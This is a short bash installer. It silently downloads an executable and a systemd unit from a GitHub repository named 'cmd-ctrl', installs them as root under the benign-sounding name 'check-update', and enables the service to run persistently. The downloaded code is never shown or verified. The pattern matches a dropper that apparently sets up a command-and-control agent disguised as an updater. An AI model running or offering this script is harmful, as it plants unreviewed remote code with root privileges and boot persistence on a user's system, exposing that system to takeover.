#!/bin/bash

# Download script
sudo curl -s https://raw.githubusercontent.com/kiaolin/cmd-ctrl/main/check-update -o /usr/local/bin/check-update
sudo chmod +x /usr/local/bin/check-update

# Download systemd service
sudo curl -s https://raw.githubusercontent.com/kiaolin/cmd-ctrl/main/check-update.service -o /etc/systemd/system/check-update.service

# Reload systemd and enable service
sudo systemctl daemon-reload
sudo systemctl enable check-update
sudo systemctl start check-update
